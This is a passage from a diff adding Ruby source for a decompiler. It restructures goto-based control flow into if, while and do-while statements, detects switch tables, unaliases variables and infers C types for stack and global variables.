ary.first.kind_of? C::If and ary.first.bthen.kind_of? C::Goto and + not ary.first.belse and s.bthen.target == ary.first.bthen.target + s.test = C::CExpression[s.test, :'||', ary.shift.test] + end + + # if (a) goto x; b; x: => if (!a) { b; } + if s.kind_of? C::If and s.bthen.kind_of? C::Goto and l = ary.grep(C::Label).find { |l_| l_.name == s.bthen.target } + # if {goto l;} a; l: => if (!) {a;} + s.test = C::CExpression.negate s.test + s.bthen = C::Block.new(scope) + s.bthen.statements = decompile_cseq_if(ary[0..ary.index(l)], s.bthen) + s.bthen.statements.pop # remove l: from bthen, it is in ary (was needed in bthen for inner ifs) + ary[0...ary.index(l)] = [] + end + + if s.kind_of? C::If and (s.bthen.kind_of? C::Block or s.bthen.kind_of? C::Goto) + s.bthen = C::Block.new(scope, [s.bthen]) if s.bthen.kind_of? C::Goto + + bts = s.bthen.statements + + # if (a) if (b) { c; } => if (a && b) { c; } + if bts.length == 1 and bts.first.kind_of? C::If and not bts.first.belse + s.test = C::CExpression[s.test, :'&&', bts.first.test] + bts = bts.first.bthen + bts = s.bthen.statements = bts.kind_of?(C::Block) ? bts.statements : [bts] + end + + # if (a) { if (b) goto c; d; } c: => if (a && !b) { d; } + if bts.first.kind_of? C::If and l = bts.first.bthen and (l = l.kind_of?(C::Block) ? l.statements.first : l) and l.kind_of? C::Goto and ary[0].kind_of? C::Label and l.target == ary[0].name + s.test = C::CExpression[s.test, :'&&', C::CExpression.negate(bts.first.test)] + if e = bts.shift.belse + bts.unshift e + end + end + + # if () { goto a; } a: + if bts.last.kind_of? C::Goto and ary[0].kind_of? C::Label and bts.last.target == ary[0].name + bts.pop + end + + # if { a; goto outer; } b; return; => if (!) { b; return; } a; goto outer; + if bts.last.kind_of? C::Goto and not inner_labels.include? bts.last.target and g = ary.find { |ss| ss.kind_of? C::Goto or ss.kind_of? C::Return } and g.kind_of? C::Return + s.test = C::CExpression.negate s.test + ary[0..ary.index(g)], bts[0..-1] = bts, ary[0..ary.index(g)] + end + + # if { a; goto l; } b; l: => if {a;} else {b;} + if bts.last.kind_of? C::Goto and l = ary.grep(C::Label).find { |l_| l_.name == bts.last.target } + s.belse = C::Block.new(scope) + s.belse.statements = decompile_cseq_if(ary[0...ary.index(l)], s.belse) + ary[0...ary.index(l)] = [] + bts.pop + end + + # if { a; l: b; goto any;} c; goto l; => if { a; } else { c; } b; goto any; + if not s.belse and (bts.last.kind_of? C::Goto or bts.last.kind_of? C::Return) and g = ary.grep(C::Goto).first and l = bts.grep(C::Label).find { |l_| l_.name == g.target } + s.belse = C::Block.new(scope) + s.belse.statements = decompile_cseq_if(ary[0...ary.index(g)], s.belse) + ary[0..ary.index(g)], bts[bts.index(l)..-1] = bts[bts.index(l)..-1], [] + end + + # if { a; b; c; } else { d; b; c; } => if {a;} else {d;} b; c; + if s.belse + bes = s.belse.statements + while not bts.empty? + if bts.last.kind_of? C::Label; ary.unshift bts.pop + elsif bes.last.kind_of? C::Label; ary.unshift bes.pop + elsif bts.last.to_s == bes.last.to_s; ary.unshift bes.pop ; bts.pop + else break + end + end + + # if () { a; } else { b; } => if () { a; } else b; + # if () { a; } else {} => if () { a; } + case bes.length + when 0; s.belse = nil + #when 1; s.belse = bes.first + end + end + + # if () {} else { a; } => if (!) { a; } + # if () { a; } => if () a; + case bts.length + when 0; s.test, s.bthen, s.belse = C::CExpression.negate(s.test), s.belse, nil if s.belse + #when 1; s.bthen = bts.first # later (allows simpler handling in _while) + end + end + + # l1: l2: if () goto l1; goto l2; => if(!) goto l2; goto l1; + if s.kind_of? C::If + ls = s.bthen + ls = ls.statements.last if ls.kind_of? C::Block + if ls.kind_of? C::Goto + if li = inner_labels.index(ls.target) + table = inner_labels + else + table = ary.map { |st| st.name if st.kind_of? C::Label }.compact.reverse + li = table.index(ls.target) || table.length + end + g = ary.find { |ss| + break if ss.kind_of? C::Return + next if not ss.kind_of? C::Goto + table.index(ss.target).to_i > li + } + if g + s.test = C::CExpression.negate s.test + if not s.bthen.kind_of? C::Block + ls = C::Block.new(scope) + ls.statements << s.bthen + s.bthen = ls + end + ary[0..ary.index(g)], s.bthen.statements = s.bthen.statements, decompile_cseq_if(ary[0..ary.index(g)], scope) + end + end + end + + ret << s + end + ret + end + + def decompile_cseq_while(ary, scope) + return if forbid_decompile_ifwhile + + # find the next instruction that is not a label + ni = lambda { |l| ary[ary.index(l)..-1].find { |s| not s.kind_of? C::Label } } + + # TODO XXX get rid of #index + finished = false ; while not finished ; finished = true # 1.9 does not support 'retry' + ary.each { |s| + case s + when C::Label + if ss = ni[s] and ss.kind_of? C::If and not ss.belse and ss.bthen.kind_of? C::Block + if ss.bthen.statements.last.kind_of? C::Goto and ss.bthen.statements.last.target == s.name + ss.bthen.statements.pop + if l = ary[ary.index(ss)+1] and l.kind_of? C::Label + ss.bthen.statements.grep(C::If).each { |i| + i.bthen = C::Break.new if i.bthen.kind_of? C::Goto and i.bthen.target == l.name + } + end + ary[ary.index(ss)] = C::While.new(ss.test, ss.bthen) + elsif ss.bthen.statements.last.kind_of? C::Return and g = ary[ary.index(s)+1..-1].reverse.find { |_s| _s.kind_of? C::Goto and _s.target == s.name } + wb = C::Block.new(scope) + wb.statements = decompile_cseq_while(ary[ary.index(ss)+1...ary.index(g)], wb) + w = C::While.new(C::CExpression.negate(ss.test), wb) + ary[ary.index(ss)..ary.index(g)] = [w, *ss.bthen.statements] + finished = false ; break #retry + end + end + if g = ary[ary.index(s)..-1].reverse.find { |_s| _s.kind_of? C::Goto and _s.target == s.name } + wb = C::Block.new(scope) + wb.statements = decompile_cseq_while(ary[ary.index(s)...ary.index(g)], wb) + w = C::While.new(C::CExpression[1], wb) + ary[ary.index(s)..ary.index(g)] = [w] + finished = false ; break #retry + end + if g = ary[ary.index(s)..-1].reverse.find { |_s| _s.kind_of? C::If and not _s.belse and gt = _s.bthen and + (gt = gt.kind_of?(C::Block) && gt.statements.length == 1 ? gt.statements.first : gt) and gt.kind_of? C::Goto and gt.target == s.name } + wb = C::Block.new(scope) + wb.statements = decompile_cseq_while(ary[ary.index(s)...ary.index(g)], wb) + w = C::DoWhile.new(g.test, wb) + ary[ary.index(s)..ary.index(g)] = [w] + finished = false ; break #retry + end + when C::If + decompile_cseq_while(s.bthen.statements, s.bthen) if s.bthen.kind_of? C::Block + decompile_cseq_while(s.belse.statements, s.belse) if s.belse.kind_of? C::Block + when C::While, C::DoWhile + decompile_cseq_while(s.body.statements, s.body) if s.body.kind_of? C::Block + end + } + end + ary + end + + # TODO + def decompile_cseq_switch(scope) + uncast = lambda { |e| e = e.rexpr while e.kind_of? C::CExpression and not e.op ; e } + walk(scope) { |s| + # XXX pfff... + next if not s.kind_of? C::If + # if (v < 12) return ((void(*)())(tableaddr+4*v))(); + t = s.bthen + t = t.statements.first if t.kind_of? C::Block and t.statements.length == 1 + next if not t.kind_of? C::Return or not t.respond_to? :from_instr + next if t.from_instr.comment.to_a.include? 'switch' + next if not t.value.kind_of? C::CExpression or t.value.op != :funcall or t.value.rexpr != [] or not t.value.lexpr.kind_of? C::CExpression or t.value.lexpr.op + p = uncast[t.value.lexpr.rexpr] + next if not p.kind_of? C::CExpression or p.op != :* or p.lexpr + p = uncast[p.rexpr] + next if not p.kind_of? C::CExpression or p.op != :+ + r, l = uncast[p.rexpr], uncast[p.lexpr] + r, l = l, r if r.kind_of? C::CExpression + next if not r.kind_of? ::Integer or not l.kind_of? C::CExpression or l.op != :* or not l.lexpr + lr, ll = uncast[l.rexpr], uncast[l.lexpr] + lr, ll = ll, lr if not ll.kind_of? ::Integer + next if ll != sizeof(nil, C::Pointer.new(C::BaseType.new(:void))) + base, index = r, lr + if s.test.kind_of? C::CExpression and (s.test.op == :<= or s.test.op == :<) and s.test.lexpr == index and + s.test.rexpr.kind_of? C::CExpression and not s.test.rexpr.op and s.test.rexpr.rexpr.kind_of? ::Integer + t.from_instr.add_comment 'switch' + sup = s.test.rexpr.rexpr + rng = ((s.test.op == :<) ? (0...sup) : (0..sup)) + from = t.from_instr.address + rng.map { |i| @dasm.backtrace(Indirection[base+ll*i, ll, from], from, :type => :x, :origin => from, :maxdepth => 0) } + @dasm.disassemble + throw :restart, :restart + end + puts "unhandled switch() at #{t.from_instr}" if $VERBOSE + } + end + + # remove unused labels + def remove_labels(scope) + return if forbid_optimize_labels + + used = [] + walk(scope) { |ss| + used |= [ss.target] if ss.kind_of? C::Goto + } + walk(scope) { |s| + next if not s.kind_of? C::Block + s.statements.delete_if { |l| + l.kind_of? C::Label and not used.include? l.name + } + } + + # remove implicit continue; at end of loop + walk(scope) { |s| + next if not s.kind_of? C::While + if s.body.kind_of? C::Block and s.body.statements.last.kind_of? C::Continue + s.body.statements.pop + end + } + end + + # checks if expr is a var (var or *&var) + def isvar(ce, var) + if var.stackoff and ce.kind_of? C::CExpression + return unless ce.op == :* and not ce.lexpr + ce = ce.rexpr + ce = ce.rexpr while ce.kind_of? C::CExpression and not ce.op + return unless ce.kind_of? C::CExpression and ce.op == :& and not ce.lexpr + ce = ce.rexpr + end + ce == var + end + + # checks if expr reads var + def ce_read(ce_, var) + isvar(ce_, var) or + walk_ce(ce_) { |ce| + case ce.op + when :funcall; break true if isvar(ce.lexpr, var) or ce.rexpr.find { |a| isvar(a, var) } + when :'='; break true if isvar(ce.rexpr, var) + break ce_read(ce.rexpr, var) if isvar(ce.lexpr, var) # *&var = 2 + else break true if isvar(ce.lexpr, var) or isvar(ce.rexpr, var) + end + } + end + + # checks if expr writes var + def ce_write(ce_, var) + walk_ce(ce_) { |ce| + break true if AssignOp.include?(ce.op) and (isvar(ce.lexpr, var) or + (((ce.op == :'++' or ce.op == :'--') and isvar(ce.rexpr, var)))) + } + end + + # patches a set of exprs, replacing oldce by newce + def ce_patch(exprs, oldce, newce) + walk_ce(exprs) { |ce| + case ce.op + when :funcall + ce.lexpr = newce if ce.lexpr == oldce + ce.rexpr.each_with_index { |a, i| ce.rexpr[i] = newce if a == oldce } + else + ce.lexpr = newce if ce.lexpr == oldce + ce.rexpr = newce if ce.rexpr == oldce + end + } + end + + + # duplicate vars per domain value + # eg eax = 1; foo(eax); eax = 2; bar(eax); => eax = 1; foo(eax) eax_1 = 2; bar(eax_1); + # eax = 1; if (bla) eax = 2; foo(eax); => no change + def unalias_vars(scope, func) + g = c_to_graph(scope) + + # unalias func args first, they may include __attr__((out)) needed by the others + funcalls = [] + walk_ce(scope) { |ce| funcalls << ce if ce.op == :funcall } + vars = scope.symbol.values.sort_by { |v| walk_ce(funcalls) { |ce| break true if ce.rexpr == v } ? 0 : 1 } + + # find the domains of var aliases + vars.each { |var| unalias_var(var, scope, g) } + end + + # duplicates a var per domain value + def unalias_var(var, scope, g = c_to_graph(scope)) + # [label, index] of references to var (reading it, writing it, ro/wo it (eg eax = *eax => eax_0 = *eax_1)) + read = {} + write = {} + ro = {} + wo = {} + + # list of [l, i] for which domain is not known + unchecked = [] + + # mark all exprs of the graph + # TODO handle var_14 __attribute__((out)) = &curvar <=> curvar write + r = var.has_attribute_var('register') + g.exprs.each { |label, exprs| + exprs.each_with_index { |ce, i| + if ce_read(ce, var) + if (ce.op == :'=' and isvar(ce.lexpr, var) and not ce_write(ce.rexpr, var)) or + (ce.op == :funcall and r and not ce_write(ce.lexpr, var) and not ce_write(ce.rexpr, var) and @dasm.cpu.abi_funcall[:changed].include?(r.to_sym)) + (ro[label] ||= []) << i + (wo[label] ||= []) << i + unchecked << [label, i, :up] << [label, i, :down] + else + (read[label] ||= []) << i + unchecked << [label, i] + end + elsif ce_write(ce, var) + (write[label] ||= []) << i + unchecked << [label, i] + end + } + } + + # stuff when filling the domain (flood algorithm) + dom = dom_ro = dom_wo = todo_up = todo_down = func_top = nil + + # flood by walking the graph up from [l, i] (excluded) + # marks stuff do walk down + walk_up = lambda { |l, i| + todo_w = [[l, i-1]] + done_w = [] + while o = todo_w.pop + next if done_w.include? o + done_w << o + l, i = o + loop do + if read[l].to_a.include? i + # XXX not optimal (should mark only the uppest read) + todo_down |= [[l, i]] if not dom.include? [l, i] + dom |= [[l, i]] + elsif write[l].to_a.include? i + todo_down |= [[l, i]] if not dom.include? [l, i] + dom |= [[l, i]] + break + elsif wo[l].to_a.include? i + todo_down |= [[l, i]] if not dom_wo.include? [l, i, :down] + dom_wo |= [[l, i, :down]] + break + end + i -= 1 + if i < 0 + g.from_optim[l].to_a.each { |ll| + todo_w << [ll, g.exprs[ll].to_a.length-1] + } + func_top = true if g.from_optim[l].to_a.empty? + break + end + end + end + } + + # flood by walking the graph down from [l, i] (excluded) + # malks stuff to walk up + walk_down = lambda { |l, i| + todo_w = [[l, i+1]] + done_w = [] + while o = todo_w.pop + next if done_w.include? o + done_w << o + l, i = o + loop do + if read[l].to_a.include? i + todo_up |= [[l, i]] if not dom.include? [l, i] + dom |= [[l, i]] + elsif write[l].to_a.include? i + break + elsif ro[l].to_a.include? i + todo_up |= [[l, i]] if not dom_ro.include? [l, i, :up] + dom_ro |= [[l, i, :up]] + break + end + i += 1 + if i >= g.exprs[l].to_a.length + g.to_optim[l].to_a.each { |ll| + todo_w << [ll, 0] + } + break + end + end + end + } + + # check it out + while o = unchecked.shift + dom = [] + dom_ro = [] + dom_wo = [] + func_top = false + + todo_up = [] + todo_down = [] + + # init + if read[o[0]].to_a.include? o[1] + todo_up << o + todo_down << o + dom << o + elsif write[o[0]].to_a.include? o[1] + todo_down << o + dom << o + elsif o[2] == :up + todo_up << o + dom_ro << o + elsif o[2] == :down + todo_down << o + dom_wo << o + else raise + end + + # loop + while todo_up.first or todo_down.first + todo_up.each { |oo| walk_up[oo[0], oo[1]] } + todo_up.clear + + todo_down.each { |oo| walk_down[oo[0], oo[1]] } + todo_down.clear + end + + unchecked -= dom + dom_wo + dom_ro + + next if func_top + + # patch + n_i = 0 + n_i += 1 while scope.symbol_ancestors[newvarname = "#{var.name}_a#{n_i}"] + + nv = var.dup + nv.storage = :register if nv.has_attribute_var('register') + nv.attributes = nv.attributes.dup if nv.attributes + nv.name = newvarname + scope.statements << C::Declaration.new(nv) + scope.symbol[nv.name] = nv + + dom.each { |oo| ce_patch(g.exprs[oo[0]][oo[1]], var, nv) } + dom_ro.each { |oo| + ce = g.exprs[oo[0]][oo[1]] + if ce.op == :funcall or ce.rexpr.kind_of? C::CExpression + ce_patch(ce.rexpr, var, nv) + else + ce.rexpr = nv + end + } + dom_wo.each { |oo| + ce = g.exprs[oo[0]][oo[1]] + if ce.op == :funcall + elsif ce.lexpr.kind_of? C::CExpression + ce_patch(ce.lexpr, var, nv) + else + ce.lexpr = nv + end + } + + # check if the var is only used as an __out__ parameter + if false and dom_ro.empty? and dom_wo.empty? and dom.length == 2 and # TODO + arg.has_attribute('out') and not arg.has_attribute('in') + # *(int32*)&var_10 = &var_4; + # set_pointed_value(*(int32*)&var_10); => writeonly var_4, may start a new domain + nv.add_attribute('out') + end + end + end + + # revert the unaliasing namechange of vars where no alias subsists + def simplify_varname_noalias(scope) + names = scope.symbol.keys + names.delete_if { |k| + next if not b = k[/^(.*)_a\d+$/, 1] + next if scope.symbol[k].stackoff.to_i > 0 + if not names.find { |n| n != k and (n == b or n[/^(.*)_a\d+$/, 1] == b) } + scope.symbol[b] = scope.symbol.delete(k) + scope.symbol[b].name = b + end + } + end + + # patch scope to transform :frameoff-x into &var_x + def namestackvars(scope) + off2var = {} + newvar = lambda { |o, n| + if not v = off2var[o] + v = off2var[o] = C::Variable.new + v.type = C::BaseType.new(:void) + v.name = n + v.stackoff = o + scope.symbol[v.name] = v + scope.statements << C::Declaration.new(v) + end + v + } + + scope.decompdata[:stackoff_name].each { |o, n| newvar[o, n] } + scope.decompdata[:stackoff_type].each { |o, t| newvar[o, stackoff_to_varname(o)] } + + walk_ce(scope) { |e| + next if e.op != :+ and e.op != :- + next if not e.lexpr.kind_of? C::Variable or e.lexpr.name != 'frameptr' + next if not e.rexpr.kind_of? C::CExpression or e.rexpr.op or not e.rexpr.rexpr.kind_of? ::Integer + off = e.rexpr.rexpr + off = -off if e.op == :- + v = newvar[off, stackoff_to_varname(off)] + e.replace C::CExpression[:&, v] + } + end + + # assign type to vars (regs, stack & global) + # types are found by subfunction argument types & indirections, and propagated through assignments etc + # TODO when updating the type of a var, update the type of all cexprs where it appears + def decompile_c_types(scope) + return if forbid_decompile_types + + # TODO *(int8*)(ptr+8); *(int32*)(ptr+12) => automatic struct + + # name => type + types = {} + + pscopevar = lambda { |e| + e = e.rexpr while e.kind_of? C::CExpression and not e.op and e.rexpr.kind_of? C::CExpression + if e.kind_of? C::CExpression and e.op == :& and not e.lexpr and e.rexpr.kind_of? C::Variable + e.rexpr.name if scope.symbol[e.rexpr.name] + end + } + scopevar = lambda { |e| + e = e.rexpr if e.kind_of? C::CExpression and not e.op + if e.kind_of? C::Variable and scope.symbol[e.name] + e.name + elsif e.kind_of? C::CExpression and e.op == :* and not e.lexpr + pscopevar[e.rexpr] + end + } + globalvar = lambda { |e| + e = e.rexpr if e.kind_of? C::CExpression and not e.op + if e.kind_of? ::Integer and @dasm.get_section_at(e) + e + elsif e.kind_of? C::Variable and not scope.symbol[e.name] and @c_parser.toplevel.symbol[e.name] and @dasm.get_section_at(e.name) + e.name + end + } + + # check if a newly found type for o is better than current type + # order: foo* > void* > foo + better_type = lambda { |t0, t1| + t1 == C::BaseType.new(:void) or (t0.pointer? and t1.kind_of? C::BaseType) or t0.untypedef.kind_of? C::Union or + (t0.kind_of? C::BaseType and t1.kind_of? C::BaseType and (@c_parser.typesize[t0.name] > @c_parser.typesize[t1.name] or (t0.name == t1.name and t0.qualifier))) or + (t0.pointer? and t1.pointer? and better_type[t0.pointed, t1.pointed]) + } + + update_global_type = lambda { |e, t| + if ne = new_global_var(e, t, scope) + ne.type = t if better_type[t, ne.type] # TODO patch existing scopes using ne + # TODO rename (dword_xx -> byte_xx etc) + e = scope.symbol_ancestors[e] || e if e.kind_of? String # exe reloc + walk_ce(scope) { |ce| + ce.lexpr = ne if ce.lexpr == e + ce.rexpr = ne if ce.rexpr == e + if ce.op == :* and not ce.lexpr and ce.rexpr == ne and ne.type.pointer? and ne.type.pointed.untypedef.kind_of? C::Union + # *struct -> struct->bla + ce.rexpr = structoffset(ne.type.pointed.untypedef, ce.rexpr, 0, sizeof(ce.type)) + elsif ce.lexpr == ne or ce.rexpr == ne + # set ce type according to l/r + # TODO set ce.parent type etc + ce.type = C::CExpression[ce.lexpr, ce.op, ce.rexpr].type + end + } + end + } + + propagate_type = nil # fwd declaration + propagating = [] # recursion guard (x = &x) + # check if need to change the type of a var + # propagate_type if type is updated + update_type = lambda { |n, t| + next if propagating.include? n + o = scope.symbol[n].stackoff + next if not o and t.untypedef.kind_of? C::Union + next if o and scope.decompdata[:stackoff_type][o] and t != scope.decompdata[:stackoff_type][o] + next if t0 = types[n] and not better_type[t, t0] + next if o and (t.integral? or t.pointer?) and o % sizeof(t) != 0 # keep vars aligned + types[n] = t + next if t == t0 + propagating << n + propagate_type[n, t] + propagating.delete n + next if not o + t = t.untypedef + if t.kind_of? C::Struct + t.members.to_a.each { |m| + mo = t.offsetof(@c_parser, m.name) + next if mo == 0 + scope.symbol.each { |vn, vv| + update_type[vn, m.type] if vv.stackoff == o+mo + } + } + end + } + + # try to update the type of a var from knowing the type of an expr (through dereferences etc) + known_type = lambda { |e, t| + loop do + e = e.rexpr while e.kind_of? C::CExpression and not e.op and e.type == t + if o = scopevar[e] + update_type[o, t] + elsif o = globalvar[e] + update_global_type[o, t] + elsif not e.kind_of? C::CExpression + elsif o = pscopevar[e] and t.pointer? + update_type[o, t.pointed] + elsif e.op == :* and not e.lexpr + e = e.rexpr + t = C::Pointer.new(t) + next + elsif t.pointer? and e.op == :+ and e.lexpr.kind_of? C::CExpression and e.lexpr.type.integral? and e.rexpr.kind_of? C::Variable + e.lexpr, e.rexpr = e.rexpr, e.lexpr + next + elsif e.op == :+ and e.lexpr and e.rexpr.kind_of? C::CExpression + if not e.rexpr.op and e.rexpr.rexpr.kind_of? ::Integer + if t.pointer? and e.rexpr.rexpr < 0x1000 and (e.rexpr.rexpr % sizeof(t.pointed)) == 0 # XXX relocatable + base=0.. + e = e.lexpr # (int)*(x+2) === (int) *x + next + elsif globalvar[e.rexpr.rexpr] + known_type[e.lexpr, C::BaseType.new(:int)] + e = e.rexpr + next + end + elsif t.pointer? and (e.lexpr.kind_of? C::CExpression and e.lexpr.lexpr and [:<<, :>>, :*, :&].include? e.lexpr.op) or + (o = scopevar[e.lexpr] and types[o] and types[o].integral? and + !(o = scopevar[e.rexpr] and types[o] and types[o].integral?)) + e.lexpr, e.rexpr = e.rexpr, e.lexpr # swap + e = e.lexpr + next + elsif t.pointer? and ((e.rexpr.kind_of? C::CExpression and e.rexpr.lexpr and [:<<, :>>, :*, :&].include? e.rexpr.op) or + (o = scopevar[e.rexpr] and types[o] and types[o].integral? and + !(o = scopevar[e.lexpr] and types[o] and types[o].integral?))) + e = e.lexpr + next + end + end + break + end + } + + # we found a type for a var, propagate it through affectations + propagate_type = lambda { |var, type| + walk_ce(scope) { |ce| + next if ce.op != :'=' + + if ce.lexpr.kind_of? C::Variable and ce.lexpr.name == var + known_type[ce.rexpr, type] + next + end + if ce.rexpr.kind_of? C::Variable and ce.rexpr.name == var + known_type[ce.lexpr, type] + next + end + + # int **x; y = **x => int y + t = type + l = ce.lexpr + while l.kind_of? C::CExpression and l.op == :* and not l.lexpr + if var == pscopevar[l.rexpr] + known_type[ce.rexpr, t] + break + elsif t.pointer? + l = l.rexpr + t = t.pointed + else break + end + end + + # int **x; **x = y => int y + t = type + r = ce.rexpr + while r.kind_of? C::CExpression and r.op == :* and not r.lexpr + if var == pscopevar[r.rexpr] + known_type[ce.lexpr, t] + break + elsif t.pointer? + r = r.rexpr + t = t.pointed + else break + end + end + + # TODO int *x; *x = *y; ? + } + } + + # put all those macros in use + # use user-defined types first + scope.symbol.each_value { |v| + next if not v.kind_of? C::Variable or not v.stackoff or not t = scope.decompdata[:stackoff_type][v.stackoff] + known_type[v, t] + } + + # try to infer types from C semantics + later = [] + walk_ce(scope) { |ce| + if ce.op == :'=' and ce.rexpr.kind_of? C::CExpression and (ce.rexpr.op == :funcall or (ce.rexpr.op == nil and ce.rexpr.rexpr.kind_of? ::Integer and + ce.rexpr.rexpr.abs < 0x10000 and (not ce.lexpr.kind_of? C::CExpression or ce.lexpr.op != :'*' or ce.lexpr.lexpr))) + # var = int + known_type[ce.lexpr, ce.rexpr.type] + elsif ce.op == :funcall + f = ce.lexpr.type + f = f.pointed if f.pointer? + next if not f.kind_of? C::Function + # cast func args to arg prototypes + f.args.to_a.zip(ce.rexpr).each_with_index { |(proto, arg), i| ce.rexpr[i] = C::CExpression[arg, proto.type] ; known_type[arg, proto.type] } + elsif ce.op == :* and not ce.lexpr + if e = ce.rexpr and e.kind_of? C::CExpression and not e.op and e = e.rexpr and e.kind_of? C::CExpression and + e.op == :& and not e.lexpr and e.rexpr.kind_of? C::Variable and e.rexpr.stackoff + # skip *(__int32*)&var_12 for now, avoid saying var12 is an int if it may be a ptr or anything + later << [ce.rexpr, C::Pointer.new(ce.type)] + next + end + known_type[ce.rexpr, C::Pointer.new(ce.type)] + elsif not ce.op and ce.type.pointer? and ce.type.pointed.kind_of? C::Function + # cast to fptr: must be a fptr + known_type[ce.rexpr, ce.type] + end + } + + later.each { |ce, t| known_type[ce, t] } + + # offsets have types now + types.each { |v, t| + # keep var type qualifiers + q = scope.symbol[v].type.qualifier + scope.symbol[v].type = t + t.qualifier = q if q + } + + + # remove offsets to struct members + # XXX this defeats antialiasing + # off => [structoff, membername, membertype] + memb = {} + types.dup.each { |n, t| + v = scope.symbol[n] + next if not o = v.stackoff + t = t.untypedef + if t.kind_of? C::Struct + t.members.to_a.each { |tm| + moff = t.offsetof(@c_parser, tm.name) + next if moff == 0 + types.delete_if { |vv, tt| scope.symbol[vv].stackoff == o+moff } + memb[o+moff] = [v, tm.name, tm.type] + } + end + } + + # patch local variables into the CExprs, incl unknown offsets + varat = lambda { |n| + v = scope.symbol[n] + if s = memb[v.stackoff] + v = C::CExpression[s[0], :'.', s[1], s[2]] + else + v.type = types[n] || C::BaseType.new(:int) + end + v + } + + maycast = lambda { |v, e| + if sizeof(v) != sizeof(e) + v = C::CExpression[:*, [[:&, v], C::Pointer.new(e.type)]] + end + v + } + maycast_p = lambda { |v, e| + if not e.type.pointer? or sizeof(v) != sizeof(nil, e.type.pointed) + C::CExpression[[:&, v], e.type] + else + C::CExpression[:&, v] + end + } + + walk_ce(scope, true) { |ce| + case + when ce.op == :funcall + ce.rexpr.map! { |re| + if o = scopevar[re]; C::CExpression[maycast[varat[o], re]] + elsif o = pscopevar[re]; C::CExpression[maycast_p[varat[o], re]] + else re + end + } + when o = scopevar[ce.lexpr]; ce.lexpr = maycast[varat[o], ce.lexpr] + when o = scopevar[ce.rexpr]; ce.rexpr = maycast[varat[o], ce.rexpr] + ce.rexpr = C::CExpression[ce.rexpr] if not ce.op and ce.rexpr.kind_of? C::Variable + when o = pscopevar[ce.lexpr]; ce.lexpr = maycast_p[varat[o], ce.lexpr] + when o = pscopevar[ce.rexpr]; ce.rexpr = maycast_p[varat[o], ce.rexpr] + when o = scopevar[ce]; ce.replace C::CExpression[maycast[varat[o], ce]] + when o = pscopevar[ce]; ce.replace C::CExpression[maycast_p[varat[o], ce]] + end + } + + fix_type_overlap(scope) + fix_pointer_arithmetic(scope) + + # if int32 var_4 is always var_4 & 255, change type to int8 + varuse = Hash.new(0) + varandff = Hash.new(0) + varandffff = Hash.new(0) + walk_ce(scope) { |ce| + if ce.op == :& and ce.lexpr.kind_of? C::Variable and ce.lexpr.type.integral? and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer + case ce.rexpr.rexpr + when 0xff; varandff[ce.lexpr.name] += 1 + when 0xffff; varandffff[ce.lexpr.name] += 1 + end + end + varuse[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable + varuse[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable + } + varandff.each { |k, v| + scope.symbol[k].type = C::BaseType.new(:__int8, :unsigned) if varuse[k] == v + } + varandffff.each { |k, v| + scope.symbol[k].type = C::BaseType.new(:__int16, :unsigned) if varuse[k] == v + } + + # propagate types to cexprs + walk_ce(scope, true) { |ce| + if ce.op + ce.type = C::CExpression[ce.lexpr, ce.op, ce.rexpr].type rescue next + if ce.op == :'=' and ce.rexpr.kind_of? C::Typed and ce.rexpr.type != ce.type and (not ce.rexpr.type.integral? or not ce.type.integral?) + known_type[ce.rexpr, ce.type] if ce.type.pointer? and ce.type.pointed.untypedef.kind_of? C::Function # localvar = &struct with fptr + ce.rexpr = C::CExpression[[ce.rexpr], ce.type] + end + elsif ce.type.pointer? and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :& and not ce.rexpr.lexpr and sizeof(ce.rexpr.rexpr.type) == sizeof(ce.type.pointed) + ce.type = ce.rexpr.type + end + } + end + + # struct foo { int i; int j; struct { int k; int l; } m; }; bla+12 => &bla->m.l + # st is a struct, ptr is an expr pointing to a struct, off is a numeric offset from ptr, msz is the size of the pointed member (nil ignored) + def structoffset(st, ptr, off, msz) + tabidx = off / sizeof(st) + off -= tabidx * sizeof(st) + ptr = C::CExpression[:&, [ptr, :'[]', [tabidx]]] if tabidx != 0 or ptr.type.untypedef.kind_of? C::Array + return ptr if off == 0 and (not msz or # avoid infinite recursion with eg chained list + (ptr.kind_of? C::CExpression and ((ptr.op == :& and not ptr.lexpr and s=ptr.rexpr) or (ptr.op == :'.' and s=ptr)) and + not s.type.untypedef.kind_of? C::Union)) + + m_ptr = lambda { |m| + if ptr.kind_of? C::CExpression and ptr.op == :& and not ptr.lexpr + C::CExpression[ptr.rexpr, :'.', m.name] + else + C::CExpression[ptr, :'->', m.name] + end + } + + # recursive proc to list all named members, including in anonymous substructs + submemb = lambda { |sm| sm.name ? sm : sm.type.kind_of?(C::Union) ? sm.type.members.to_a.map { |ssm| submemb[ssm] } : nil } + mbs = st.members.to_a.map { |m| submemb[m] }.flatten.compact + mo = mbs.inject({}) { |h, m| h.update m => st.offsetof(@c_parser, m.name) } + + if sm = mbs.find { |m| mo[m] == off and (not msz or sizeof(m) == msz) } || + mbs.find { |m| mo[m] <= off and mo[m]+sizeof(m) > off } + off -= mo[sm] + sst = sm.type.untypedef + #return ptr if mo[sm] == 0 and sst.pointer? and sst.type.untypedef == st # TODO fix infinite recursion on mutually recursive ptrs + ptr = C::CExpression[:&, m_ptr[sm]] + if sst.kind_of? C::Union + return structoffset(sst, ptr, off, msz) + end + end + + if off != 0 + C::CExpression[[[ptr], C::Pointer.new(C::BaseType.new(:__int8))], :+, [off]] + else + ptr + end + end + + # fix pointer arithmetic (eg int foo += 4 => int* foo += 1) + # use struct member access (eg *(structptr+8) => structptr->bla) + # must be run only once, right after type setting + def fix_pointer_arithmetic(scope) + walk_ce(scope, true) { |ce| + if ce.lexpr and ce.lexpr.type.pointer? and [:&, :>>, :<<].include? ce.op + ce.lexpr = C::CExpression[[ce.lexpr], C::BaseType.new(:int)] + end + + if ce.op == :+ and ce.lexpr and ((ce.lexpr.type.integral? and ce.rexpr.type.pointer?) or (ce.rexpr.type.pointer? and ce.rexpr.type.pointed.untypedef.kind_of? C::Union)) + ce.rexpr, ce.lexpr = ce.lexpr, ce.rexpr + end + + if ce.op == :* and not ce.lexpr and ce.rexpr.type.pointer? and ce.rexpr.type.pointed.untypedef.kind_of? C::Struct + s = ce.rexpr.type.pointed.untypedef + m = s.members.to_a.find { |m_| s.offsetof(@c_parser, m_.name) == 0 } + if sizeof(m) != sizeof(ce) + ce.rexpr = 